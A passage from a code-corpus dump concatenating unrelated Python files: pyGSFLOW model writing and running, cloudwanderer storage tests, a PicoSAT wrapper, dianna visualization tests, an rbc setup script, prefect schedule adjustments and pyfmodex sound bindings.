new_param_file_list = []
for ifile, par_record in enumerate(
self.prms.parameters.parameters_list
):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_file = os.path.join(workspace, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values("param_file", new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_file = os.path.relpath(
os.path.join(workspace, dfile), self.control.model_dir
)
self.prms.data.model_dir = workspace
self.prms.data.name = dfile
self.control.set_values("data_file", [curr_file])
# flatten mf
if self.mf is not None:
self.mf.change_model_ws(workspace)
self.mf._set_name(os.path.join(workspace, basename))
self._update_mf_basename(basename)
mfnm = basename + ".nam"
self.control.set_values(
"modflow_name",
[
os.path.relpath(
os.path.join(workspace, mfnm), self.control.model_dir
)
],
)
# update file names in control object
self._update_control_fnames(workspace, basename)
self.prms.control = self.control
self._write_all(write_only)
else:
raise NotImplementedError()
def _update_control_fnames(self, workspace, basename):
"""
Method to update control file names and paths
Parameters
----------
workspace : str
model output directory
basename : str
project basename
"""
if workspace is not None and basename is None:
self.control.model_dir = workspace
for rec_name in GsConstant.GSFLOW_FILES:
if rec_name in self.control.record_names:
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
va = os.path.join(workspace, os.path.basename(fil))
va = os.path.relpath(va, self.control.model_dir)
file_value.append(va)
self.control.set_values(rec_name, file_value)
else:
for rec_name in GsConstant.GSFLOW_FILES:
if rec_name in self.control.record_names:
if rec_name in ("modflow_name",):
continue
elif rec_name in (
"modflow_name",
"param_file",
"data_file",
):
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
ws, filvalue = os.path.split(fil)
if not ws:
pass
else:
filvalue = os.path.relpath(
fil, self.control.model_dir
)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
else:
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
if workspace is None:
workspace = self.control.model_dir
vvfile = rec_name.split("_")
del vvfile[-1]
vvfile = "_".join(vvfile)
if "." in fil:
ext = fil.split(".")[-1]
else:
ext = "dat"
vvfile = basename + "_" + vvfile + "." + ext
filvalue = os.path.join(workspace, vvfile)
filvalue = os.path.relpath(
filvalue, self.control.model_dir
)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
def _update_mf_basename(self, basename):
"""
Convience method to update modflow Basename
Parameters
----------
basename : str
basename of the Modflow object
"""
out_files_list = []
for ix, out_file in enumerate(self.mf.output_fnames):
if out_file.count(".") > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
else:
ext = out_file.split(".")[-1]
new_outfn = "{}.{}".format(basename, ext)
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
def _write_all(self, write_only):
"""
Method to write input files
Parameters
----------
write_only : list
list of files to write accepts,
control, parameters, prms_data, mf, and modsim
"""
write_only_options = (
"control",
"parameters",
"prms_data",
"mf",
"modsim",
)
if write_only is not None:
if not isinstance(write_only, list):
raise ValueError("write_only agrgument must be a list")
# make write options case insensitive
write_only = [i.lower() for i in write_only]
for write_option in write_only:
if not (write_option in write_only_options):
raise ValueError(
"The option '{}' is not recognized...".format(
write_option
)
)
else:
write_only = ()
# write control
if len(write_only) == 0 or "control" in write_only:
print("Writing Control file ...")
self.control.write()
if self.prms is not None:
# self write parameters
if len(write_only) == 0 or "parameters" in write_only:
print("Writing Parameters files ...")
self.prms.parameters.write()
# write data
if len(write_only) == 0 or "prms_data" in write_only:
print("Writing Data file ...")
self.prms.data.write()
# write mf
if self.mf is not None:
if len(write_only) == 0 or "mf" in write_only:
print("Writing Modflow files...")
self.mf.write_input()
if self.modsim is not None:
if len(write_only) == 0 or "modsim" in write_only:
print("Writing MODSIM shapefile")
self.modsim.write_modsim_shapefile()
def run_model(self, model_ws=".", forgive=False, gsflow_exe=None):
"""
Method to run a gsflow model
Parameters
----------
model_ws : str
parameter to specify the model directory
forgive : bool
forgives convergence issues
gslfow_exe : str or None
path to gsflow_exe, if gsflow_exe is None it will use
the previously defined gsflow_exe variable or the default
gsflow.exe.
Returns
-------
None or (success, buffer)
Examples
--------
>>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control")
>>> gsf.run_model()
"""
fn = self.control_file
if gsflow_exe is None:
gsflow_exe = self.gsflow_exe
if not os.path.isfile(gsflow_exe):
print(
"Warning : The executable of the model could not be found. "
"Use the gsflow_exe= parameter to define its path... "
)
return None
normal_msg = [
"normal termination",
] # , "simulation successful"]
if forgive:
normal_msg.append("failed to meet solver convergence criteria")
return self.__run(
exe_name=gsflow_exe,
namefile=fn,
normal_msg=normal_msg,
model_ws=model_ws,
)
def _generate_batch_file(self):
fn = os.path.dirname(self.control_file)
fn = os.path.join(fn, "__run_gsflow.bat")
self.__bat_file = fn
fidw = open(fn, "w")
exe = os.path.normpath(os.path.join(os.getcwd(), self.gsflow_exe))
cmd = exe + " " + self.control_file
fidw.write(cmd)
fidw.close()
def __run(
self,
exe_name,
namefile,
model_ws=".",
silent=False,
report=False,
normal_msg="normal termination",
cargs=None,
):
"""
This function will run the model using subprocess.Popen.
Parameters
----------
exe_name : str
Executable name (with path, if necessary) to run.
namefile : str
Namefile of model to run. The namefile must be the
filename of the namefile without the path.
model_ws : str
Path to the location of the namefile. (default is the
current working directory - './')
silent : boolean
Echo run information to screen (default is True).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
cargs : str or list of strings
additional command line arguments to pass to the executable.
Default is None
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
def which(program):
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
# test for exe in current working directory
if is_exe(program):
return program
# test for exe in path statement
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
success = False
buff = []
# convert normal_msg to lower case for comparison
if isinstance(normal_msg, str):
normal_msg = [normal_msg.lower()]
elif isinstance(normal_msg, list):
for idx, s in enumerate(normal_msg):
normal_msg[idx] = s.lower()
# Check to make sure that program and namefile exist
exe = which(exe_name)
if exe is None:
if platform.system() in "Windows":
if not exe_name.lower().endswith(".exe"):
exe = which(exe_name + ".exe")
if exe is None:
s = "The program {} does not exist or is not executable.".format(
exe_name
)
raise Exception(s)
else:
if not silent:
s = "pyGSFLOW is using the following executable to run the model: {}".format(
exe
)
print(s)
exe = os.path.normpath(os.path.join(os.getcwd(), exe))
if not os.path.isfile(os.path.join(model_ws, namefile)):
s = "The namefile for this model does not exists: {}".format(
namefile
)
raise Exception(s)
# simple little function for the thread to target
# def q_output(output, q):
# for line in iter(output.readline, b''):
# q.put(line)
# time.sleep(1)
# output.close()
# create a list of arguments to pass to Popen
argv = [exe, namefile]
# add additional arguments to Popen arguments
if cargs is not None:
if isinstance(cargs, str):
cargs = [cargs]
for t in cargs:
argv.append(t)
# run the model with Popen
# if platform.system().lower() == "windows":
# self._generate_batch_file()
# cargv = self.__bat_file
# else:
# pass
model_ws = os.path.dirname(self.control_file)
proc = sp.Popen(argv, stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws)
while True:
line = proc.stdout.readline()
c = line.decode("utf-8")
if c != "":
for msg in normal_msg:
if msg in c.lower():
success = True
break
c = c.rstrip("\r\n")
if not silent:
print("{}".format(c))
if report:
buff.append(c)
else:
break
return success, buff
| 2.484375 | 2 |
tests/integration/storage_memory/test_storage_memory_write.py | Sam-Martin/cloud-wanderer | 1 | 11326 | <filename>tests/integration/storage_memory/test_storage_memory_write.py
import logging
import pytest
from moto import mock_ec2, mock_iam, mock_sts
from cloudwanderer.cloud_wanderer_resource import CloudWandererResource
from cloudwanderer.storage_connectors import MemoryStorageConnector
from cloudwanderer.urn import URN
from tests.pytest_helpers import create_ec2_instances
logger = logging.getLogger(__name__)
@pytest.fixture(scope="function")
def memory_connector(request):
connector = MemoryStorageConnector()
connector.init()
return connector
def get_inferred_ec2_instances(cloudwanderer_boto3_session):
return [
CloudWandererResource(
urn=URN(
account_id="111111111111",
region="eu-west-2",
service="ec2",
resource_type="instance",
resource_id_parts=[instance.instance_id],
),
resource_data=instance.meta.data,
)
for instance in cloudwanderer_boto3_session.resource("ec2").instances.all()
]
def inferred_ec2_vpcs(cloudwanderer_boto3_session):
return [
CloudWandererResource(
urn=URN(
account_id="111111111111",
region="eu-west-2",
service="ec2",
resource_type="vpc",
resource_id_parts=[vpc.vpc_id],
),
resource_data=vpc.meta.data,
)
for vpc in cloudwanderer_boto3_session.resource("ec2").vpcs.all()
]
@pytest.fixture
def iam_role():
return CloudWandererResource(
urn=URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role",
resource_id_parts=["test-role"],
),
resource_data={"RoleName": "test-role", "InlinePolicyAttachments": [{"PolicyNames": ["test-role"]}]},
dependent_resource_urns=[
URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role_policy",
resource_id_parts=["test-role", "test-role-policy"],
)
],
)
@pytest.fixture
def iam_role_policies():
return [
CloudWandererResource(
urn=URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role_policy",
resource_id_parts=["test-role", "test-role-policy-1"],
),
resource_data={},
parent_urn=URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role",
resource_id_parts=["test-role"],
),
),
CloudWandererResource(
urn=URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role_policy",
resource_id_parts=["test-role", "test-role-policy-2"],
),
resource_data={},
parent_urn=URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role",
resource_id_parts=["test-role"],
),
),
]
@mock_sts
@mock_iam
def test_write_resource_and_attribute(memory_connector, iam_role):
memory_connector.write_resource(resource=iam_role)
result = memory_connector.read_resource(urn=iam_role.urn)
assert result.urn == iam_role.urn
assert result.role_name == "test-role"
logger.info(result.cloudwanderer_metadata.resource_data)
assert result.inline_policy_attachments == [{"PolicyNames": ["test-role"]}]
assert result.dependent_resource_urns == [
URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role_policy",
resource_id_parts=["test-role", "test-role-policy"],
)
]
@mock_sts
@mock_ec2
def test_write_and_delete_instances(memory_connector, cloudwanderer_boto3_session):
create_ec2_instances()
inferred_ec2_instances = get_inferred_ec2_instances(cloudwanderer_boto3_session)
memory_connector.write_resource(resource=inferred_ec2_instances[0])
result_before_delete = memory_connector.read_resource(urn=inferred_ec2_instances[0].urn)
memory_connector.delete_resource(urn=inferred_ec2_instances[0].urn)
result_after_delete = memory_connector.read_resource(urn=inferred_ec2_instances[0].urn)
assert result_before_delete.urn == inferred_ec2_instances[0].urn
assert result_after_delete is None
@mock_sts
@mock_ec2
def test_write_and_delete_resource_of_type_in_account_region(memory_connector, cloudwanderer_boto3_session):
create_ec2_instances(count=5)
inferred_ec2_instances = get_inferred_ec2_instances(cloudwanderer_boto3_session)
for i in range(5):
memory_connector.write_resource(resource=inferred_ec2_instances[i])
memory_connector.delete_resource_of_type_in_account_region(
cloud_name="aws",
service="ec2",
resource_type="instance",
account_id="111111111111",
region="eu-west-2",
cutoff=None,
)
remaining_urns = [
resource.urn for resource in memory_connector.read_resources(service="ec2", resource_type="instance")
]
assert remaining_urns == []
def test_delete_subresources_from_resource(memory_connector, iam_role, iam_role_policies):
"""If we are deleting a parent resource we should delete all its subresources."""
memory_connector.write_resource(resource=iam_role)
memory_connector.write_resource(resource=iam_role_policies[0])
memory_connector.write_resource(resource=iam_role_policies[1])
role_before_delete = memory_connector.read_resource(urn=iam_role.urn)
role_policy_1_before_delete = memory_connector.read_resource(urn=iam_role_policies[0].urn)
role_policy_2_before_delete = memory_connector.read_resource(urn=iam_role_policies[1].urn)
# Delete the parent and ensure the subresources are also deleted
memory_connector.delete_resource(urn=iam_role.urn)
role_after_delete = memory_connector.read_resource(urn=iam_role.urn)
role_policy_1_after_delete = memory_connector.read_resource(urn=iam_role_policies[0].urn)
role_policy_2_after_delete = memory_connector.read_resource(urn=iam_role_policies[1].urn)
assert role_before_delete.urn == iam_role.urn
assert role_policy_1_before_delete.urn == iam_role_policies[0].urn
assert role_policy_2_before_delete.urn == iam_role_policies[1].urn
assert role_after_delete is None
assert role_policy_1_after_delete is None
assert role_policy_2_after_delete is None
| 1.875 | 2 |
tt/satisfiability/picosat.py | fkromer/tt | 233 | 11327 | <reponame>fkromer/tt
"""Python wrapper around the _clibs PicoSAT extension."""
import os
from tt.errors.arguments import (
InvalidArgumentTypeError,
InvalidArgumentValueError)
if os.environ.get('READTHEDOCS') != 'True':
from tt._clibs import picosat as _c_picosat
VERSION = _c_picosat.VERSION
def sat_one(clauses, assumptions=None):
"""Find a solution that satisfies the specified clauses and assumptions.
This provides a light Python wrapper around the same method in the PicoSAT
C-extension. While completely tested and usable, this method is probably
not as useful as the interface provided through the
:func:`sat_one <tt.expressions.bexpr.BooleanExpression.sat_one>` method in
the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
class.
:param clauses: CNF (AND of ORs) clauses; positive integers represent
non-negated terms and negative integers represent negated terms.
:type clauses: List[List[:class:`int <python:int>`]]
:param assumptions: Assumed terms; same negation logic from ``clauses``
applies here. Note that assumptions *cannot* be an empty list; leave it
as ``None`` if there are no assumptions to include.
:type assumptions: List[:class:`int <python:int>`]
:returns: If solution is found, a list of ints representing the terms of
the solution; otherwise, if no solution found, ``None``.
:rtype: List[:class:`int <python:int>`] or ``None``
:raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
ints or ``assumptions`` is not a list of ints.
:raises InvalidArgumentValueError: If any literal ints are equal to zero.
Let's look at a simple example with no satisfiable solution::
>>> from tt import picosat
>>> picosat.sat_one([[1], [-1]]) is None
True
Here's an example where a solution exists::
>>> picosat.sat_one([[1, 2, 3], [-2, -3], [1, -2], [2, -3], [-2]])
[1, -2, -3]
Finally, here's an example using assumptions::
>>> picosat.sat_one([[1, 2, 3], [2, 3]], assumptions=[-1, -3])
[-1, 2, -3]
"""
try:
return _c_picosat.sat_one(clauses, assumptions=assumptions)
except TypeError as e:
raise InvalidArgumentTypeError(str(e))
except ValueError as e:
raise InvalidArgumentValueError(str(e))
def sat_all(clauses, assumptions=None):
"""Find all solutions that satisfy the specified clauses and assumptions.
This provides a light Python wrapper around the same method in the PicoSAT
C-extension. While completely tested and usable, this method is probably
not as useful as the interface provided through the
:func:`sat_all <tt.expressions.bexpr.BooleanExpression.sat_all>` method in
the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
class.
:param clauses: CNF (AND of ORs) clauses; positive integers represent
non-negated terms and negative integers represent negated terms.
:type clauses: List[List[:class:`int <python:int>`]]
:param assumptions: Assumed terms; same negation logic from ``clauses``
applies here. Note that assumptions *cannot* be an empty list; leave it
as ``None`` if there are no assumptions to include.
:type assumptions: List[:class:`int <python:int>`]
:returns: An iterator of solutions; if no satisfiable solutions exist, the
iterator will be empty.
:rtype: Iterator[List[:class:`int <python:int>`]]
:raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
ints or ``assumptions`` is not a list of ints.
:raises InvalidArgumentValueError: If any literal ints are equal to zero.
Here's an example showing the basic usage::
>>> from tt import picosat
>>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]]):
... print(solution)
...
[1, 2, 3, 4]
[1, 2, 3, -4]
[1, 2, -3, 4]
[1, 2, -3, -4]
[1, -2, 3, 4]
[1, -2, 3, -4]
We can cut down on some of the above solutions by including an assumption::
>>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]],
... assumptions=[-3]):
... print(solution)
...
[1, 2, -3, 4]
[1, 2, -3, -4]
"""
try:
return _c_picosat.sat_all(clauses, assumptions=assumptions)
except TypeError as e:
raise InvalidArgumentTypeError(str(e))
except ValueError as e:
raise InvalidArgumentValueError(str(e))
| 2.6875 | 3 |
tests/test_text_visualization.py | dianna-ai/dianna | 9 | 11328 | import os
import re
import shutil
import unittest
from pathlib import Path
from dianna.visualization.text import highlight_text
class Example1:
original_text = 'Doloremque aliquam totam ut. Aspernatur repellendus autem quia deleniti. Natus accusamus ' \
'doloribus et in quam officiis veniam et. '
explanation = [('ut', 25, -0.06405025896517044),
('in', 102, -0.05127647027074053),
('et', 99, 0.02254588506724936),
('quia', 58, -0.0008216335740370412),
('aliquam', 11, -0.0006268298968242725),
('Natus', 73, -0.0005556223616156406),
('totam', 19, -0.0005126140261410219),
('veniam', 119, -0.0005058379023790869),
('quam', 105, -0.0004573258796550468),
('repellendus', 40, -0.0003253862469633824)]
class Example2:
expected_html = '<html><body><span style="background:rgba(255, 0, 0, 0.08)">such</span> ' \
'<span style="background:rgba(255, 0, 0, 0.01)">a</span> <span style="background:rgba(0, 0, 255, 0.800000)">' \
'bad</span> <span style="background:rgba(0, 0, 255, 0.059287)">movie</span>.</body></html>\n'
original_text = 'Such a bad movie.'
explanation = [('bad', 7, -0.4922624307995777),
('such', 0, 0.04637815000309109),
('movie', 11, -0.03648111256069627),
('a', 5, 0.008377155657765745)]
class MyTestCase(unittest.TestCase):
temp_folder = 'temp_text_visualization_test'
html_file_path = str(Path(temp_folder) / 'output.html')
def test_text_visualization_no_output(self):
highlight_text(Example1.explanation, original_text=Example1.original_text)
assert not Path(self.html_file_path).exists()
def test_text_visualization_html_output_exists(self):
highlight_text(Example1.explanation, original_text=Example1.original_text,
output_html_filename=self.html_file_path)
assert Path(self.html_file_path).exists()
def test_text_visualization_html_output_contains_text(self):
highlight_text(Example1.explanation, original_text=Example1.original_text,
output_html_filename=self.html_file_path)
assert Path(self.html_file_path).exists()
with open(self.html_file_path, encoding='utf-8') as result_file:
result = result_file.read()
for word in _split_text_into_words(Example1.original_text):
assert word in result
def test_text_visualization_html_output_is_correct(self):
highlight_text(Example2.explanation, original_text=Example2.original_text,
output_html_filename=self.html_file_path)
assert Path(self.html_file_path).exists()
with open(self.html_file_path, encoding='utf-8') as result_file:
result = result_file.read()
assert result == Example2.expected_html
def test_text_visualization_show_plot(self):
highlight_text(Example1.explanation, original_text=Example1.original_text,
show_plot=True)
def setUp(self) -> None:
os.mkdir(self.temp_folder)
def tearDown(self) -> None:
shutil.rmtree(self.temp_folder, ignore_errors=True)
def _split_text_into_words(text):
# regex taken from
# https://stackoverflow.com/questions/12683201/python-re-split-to-split-by-spaces-commas-and-periods-but-not-in-cases-like
# explanation: split by \s (whitespace), and only split by commas and
# periods if they are not followed (?!\d) or preceded (?<!\d) by a digit.
regex = r'\s|(?<!\d)[,.](?!\d)'
return re.split(regex, text)
| 2.953125 | 3 |
setup.py | guilhermeleobas/rbc | 0 | 11329 | import os
import sys
import builtins
import versioneer
if sys.version_info[:2] < (3, 7):
raise RuntimeError("Python version >= 3.7 required.")
builtins.__RBC_SETUP__ = True
if os.path.exists('MANIFEST'):
os.remove('MANIFEST')
CONDA_BUILD = int(os.environ.get('CONDA_BUILD', '0'))
CONDA_ENV = os.environ.get('CONDA_PREFIX', '') != ''
from setuptools import setup, find_packages # noqa: E402
DESCRIPTION = "RBC - Remote Backend Compiler Project"
LONG_DESCRIPTION = """
The aim of the Remote Backend Compiler project is to distribute the
tasks of a program JIT compilation process to separate computer
systems using the client-server model. The frontend of the compiler
runs on the client computer and the backend runs on the server
computer. The compiler frontend will send the program code to compiler
backend in IR form where it will be compiled to machine code.
"""
def setup_package():
src_path = os.path.dirname(os.path.abspath(sys.argv[0]))
old_path = os.getcwd()
os.chdir(src_path)
sys.path.insert(0, src_path)
if CONDA_BUILD or CONDA_ENV:
# conda dependencies are specified in meta.yaml or conda
# enviroment should provide the correct requirements - using
# PyPI is unreliable, see below.
install_requires = []
setup_requires = []
tests_require = []
else:
# Get requirements via PyPI. Use at your own risk as more than
# once the numba and llvmlite have not matched.
install_requires = open('requirements.txt', 'r').read().splitlines()
setup_requires = ['pytest-runner', 'cffi']
tests_require = ['pytest']
metadata = dict(
name='rbc-project',
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
license='BSD',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
author='<NAME>',
maintainer='<NAME>',
author_email='<EMAIL>',
url='https://github.com/xnd-project/rbc',
platforms='Cross Platform',
classifiers=[
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
"Operating System :: OS Independent",
"Topic :: Software Development",
],
packages=find_packages(),
package_data={'': ['*.thrift']},
cffi_modules=['rbc/rbclib//_rbclib_build.py:ffibuilder'],
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_require,
)
try:
setup(**metadata)
finally:
del sys.path[0]
os.chdir(old_path)
return
if __name__ == '__main__':
setup_package()
del builtins.__RBC_SETUP__
| 1.882813 | 2 |
src/prefect/schedules/adjustments.py | concreted/prefect | 8,633 | 11330 | """
Schedule adjustments are functions that accept a `datetime` and modify it in some way.
Adjustments have the signature `Callable[[datetime], datetime]`.
"""
from datetime import datetime, timedelta
from typing import Callable
import pendulum
import prefect.schedules.filters
def add(interval: timedelta) -> Callable[[datetime], datetime]:
"""
Adjustment that adds a specified interval to the date.
Args:
- interval (timedelta): the amount of time to add
Returns:
- Callable[[datetime], bool]: the adjustment function
"""
def _adjustment_fn(dt: datetime) -> datetime:
return pendulum.instance(dt) + interval
return _adjustment_fn
def next_weekday(dt: datetime) -> datetime:
"""
Adjustment that advances a date to the next weekday. If the date is already a weekday,
it is returned unadjusted.
Args:
- dt (datetime): the datetime to adjust
Returns:
- datetime: the adjusted datetime
"""
pdt = pendulum.instance(dt)
while not prefect.schedules.filters.is_weekday(pdt):
pdt = pdt.add(days=1)
return pdt
| 3.484375 | 3 |
src/pyfmodex/sound.py | Loodoor/UnamedPy | 1 | 11331 | from .fmodobject import *
from .fmodobject import _dll
from .structures import TAG, VECTOR
from .globalvars import get_class
class ConeSettings(object):
def __init__(self, sptr):
self._sptr = sptr
self._in = c_float()
self._out = c_float()
self._outvol = c_float()
ckresult(_dll.FMOD_Sound_Get3DConeSettings(self._sptr, byref(self._in), byref(self._out), byref(self._outvol)))
@property
def inside_angle(self):
return self._in.value
@inside_angle.setter
def inside_angle(self, angle):
self._in = c_float(angle)
self._commit()
@property
def outside_angle(self):
return self._out.value
@outside_angle.setter
def outside_angle(self, angle):
self._out = c_float(angle)
self._commit()
@property
def outside_volume(self):
return self._outvol.value
@outside_volume.setter
def outside_volume(self, vol):
self._outvol = c_float(vol)
self._commit()
def _commit(self):
ckresult(_dll.FMOD_Sound_Set3DConeSettings(self._sptr, self._in, self._out, self._outvol))
class Sound(FmodObject):
def add_sync_point(self, offset, offset_type, name):
s_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_AddSyncPoint(self._ptr, offset, offset_type, name, byref(s_ptr)))
return s_ptr
def delete_sync_point(self, point):
ckresult(_dll.FMOD_Sound_DeleteSyncPoint(self._ptr, point))
@property
def threed_cone_settings(self):
return ConeSettings(self._ptr)
@property
def custom_rolloff(self):
"""Returns the custom rolloff curve.
:rtype: List of [x, y, z] lists.
"""
num = c_int()
self._call_fmod("FMOD_Sound_Get3DCustomRolloff", None, byref(num))
curve = (VECTOR * num.value)()
self._call_fmod("FMOD_Sound_Get3DCustomRolloff", byref(curve), 0)
return [p.to_list() for p in curve]
@custom_rolloff.setter
def custom_rolloff(self, curve):
"""Sets the custom rolloff curve.
:param curve: The curve to set.
:type curve: A list of something that can be treated as a list of [x, y, z] values e.g. implements indexing in some way.
"""
native_curve = (VECTOR * len(curve))(*[VECTOR.from_list(lst) for lst in curve])
self._call_fmod("FMOD_Sound_Set3DCustomRolloff", native_curve, len(native_curve))
@property
def _min_max_distance(self):
min = c_float()
max = c_float()
ckresult(_dll.FMOD_Sound_Get3DMinMaxDistance(self._ptr, byref(min), byref(max)))
return (min.value, max.value)
@_min_max_distance.setter
def _min_max_distance(self, dists):
ckresult(_dll.FMOD_Sound_Set3DMinMaxDistance(self._ptr, c_float(dists[0]), c_float(dists[1])))
@property
def min_distance(self):
return self._min_max_distance[0]
@min_distance.setter
def min_distance(self, dist):
self._min_max_distance = (dist, self._min_max_distance[1])
@property
def max_distance(self):
return self._min_max_distance[1]
@max_distance.setter
def max_distance(self, dist):
self._min_max_distance = (self._min_max_distance[0], dist)
@property
def _defaults(self):
freq = c_float()
vol = c_float()
pan = c_float()
pri = c_int()
ckresult(_dll.FMOD_Sound_GetDefaults(self._ptr, byref(freq), byref(vol), byref(pan), byref(pri)))
return [freq.value, vol.value, pan.value, pri.value]
@_defaults.setter
def _defaults(self, vals):
ckresult(_dll.FMOD_Sound_SetDefaults(self._ptr, c_float(vals[0]), c_float(vals[1]), c_float(vals[2]), vals[3]))
@property
def default_frequency(self):
return self._defaults[0]
@default_frequency.setter
def default_frequency(self, freq):
d = self._defaults
d[0] = freq
self._defaults = d
@property
def default_volume(self):
return self._defaults[1]
@default_volume.setter
def default_volume(self, vol):
d = self._defaults
d[1] = vol
self._defaults = d
@property
def default_pan(self):
return self._defaults[2]
@default_pan.setter
def default_pan(self, pan):
d = self._defaults
d[2] = pan
self._defaults = d
@property
def default_priority(self):
return self._defaults[3]
@default_priority.setter
def default_priority(self, pri):
d = self._defaults
d[3] = pri
self._defaults = d
@property
def format(self):
type = c_int()
format = c_int()
bits = c_int()
ckresult(_dll.FMOD_Sound_GetFormat(self._ptr, byref(type), byref(format), byref(bits)))
return so(type=type.value, format=format.value, bits=bits.value)
def get_length(self, ltype):
len = c_uint()
ckresult(_dll.FMOD_Sound_GetLength(self._ptr, byref(len), ltype))
return len.value
@property
def loop_count(self):
c = c_int()
ckresult(_dll.FMOD_Sound_GetLoopCount(self._ptr, byref(c)))
return c.value
@loop_count.setter
def loop_count(self, count):
ckresult(_dll.FMOD_Sound_SetLoopCount(self._ptr, count))
@property
def loop_points(self):
"""Returns tuple of two tuples ((start, startunit),(end, endunit))"""
start = c_uint()
startunit = c_int()
end = c_uint()
endunit = c_int()
ckresult(_dll.FMOD_Sound_GetLoopPoints(self._ptr, byref(start), byref(startunit), byref(end), byref(endunit)))
return ((start.value, startunit.value), (end.value, endunit.value))
@loop_points.setter
def loop_points(self, p):
"""Same format as returned from this property is required to successfully call this setter."""
ckresult(_dll.FMOD_Sound_SetLoopPoints(self._ptr, p[0][0], p[0][1], p[1][0], p[1][1]))
@property
def mode(self):
mode = c_int()
ckresult(_dll.FMOD_Sound_GetMode(self._ptr, byref(mode)))
return mode.value
@mode.setter
def mode(self, m):
ckresult(_dll.FMOD_Sound_SetMode(self._ptr, m))
def get_music_channel_volume(self, channel):
v = c_float()
ckresult(_dll.FMOD_Sound_GetMusicChannelVolume(self._ptr, channel, byref(v)))
return v.value
def set_music_channel_volume(self, id, vol):
ckresult(_dll.FMOD_Sound_SetMusicChannelVolume(self._ptr, id, c_float(vol)))
@property
def num_music_channels(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetMusicNumChannels(self._ptr, byref(num)))
return num.value
@property
def name(self):
name = create_string_buffer(256)
ckresult(_dll.FMOD_Sound_GetName(self._ptr, byref(name), 256))
return name.value
@property
def num_subsounds(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumSubSounds(self._ptr, byref(num)))
return num.value
@property
def num_sync_points(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumSyncPoints(self._ptr, byref(num)))
return num.value
@property
def num_tags(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumTags(self._ptr, byref(num)))
return num.value
@property
def open_state(self):
state = c_int()
percentbuffered = c_uint()
starving = c_bool()
diskbusy = c_bool()
ckresult(_dll.FMOD_Sound_GetOpenState(self._ptr, byref(state), byref(percentbuffered), byref(starving),
byref(diskbusy)))
return so(state=state.value, percent_buffered=percentbuffered.value, starving=starving.value,
disk_busy=diskbusy.value)
@property
def sound_group(self):
grp_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSoundGroup(self._ptr, byref(grp_ptr)))
return get_class("SoundGroup")(grp_ptr)
@sound_group.setter
def sound_group(self, group):
check_type(group, get_class("SoundGroup"))
ckresult(_dll.FMOD_Sound_SetSoundGroup(self._ptr, group._ptr))
def get_subsound(self, index):
sh_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSubSound(self._ptr, index, byref(sh_ptr)))
return Sound(sh_ptr)
def get_sync_point(self, index):
sp = c_int()
ckresult(_dll.FMOD_Sound_GetSyncPoint(self._ptr, index, byref(sp)))
return sp.value
def get_sync_point_info(self, point):
name = c_char_p()
offset = c_uint()
offsettype = c_int()
ckresult(_dll.FMOD_Sound_GetSyncPointInfo(self._ptr, point, byref(name), 256, byref(offset), byref(offsettype)))
return so(name=name.value, offset=offset.value, offset_type=offsettype.value)
@property
def system_object(self):
sptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSystemObject(self._ptr, byref(sptr)))
return get_class("System")(sptr, False)
def play(self, paused=False):
return self.system_object.play_sound(self, paused)
def get_tag(self, index, name=None):
tag = TAG()
ckresult(_dll.FMOD_Sound_GetTag(self._ptr, name, index, byref(tag)))
return tag
@property
def _variations(self):
freq = c_float()
vol = c_float()
pan = c_float()
ckresult(_dll.FMOD_Sound_GetVariations(self._ptr, byref(freq), byref(vol), byref(pan)))
return [freq.value, vol.value, pan.value]
@_variations.setter
def _variations(self, vars):
ckresult(_dll.FMOD_Sound_SetVariations(self._ptr, c_float(vars[0]), c_float(vars[1]), c_float(vars[2])))
@property
def frequency_variation(self):
return self._variations[0]
@frequency_variation.setter
def frequency_variation(self, var):
v = self._variations
v[0] = var
self._variations = var
@property
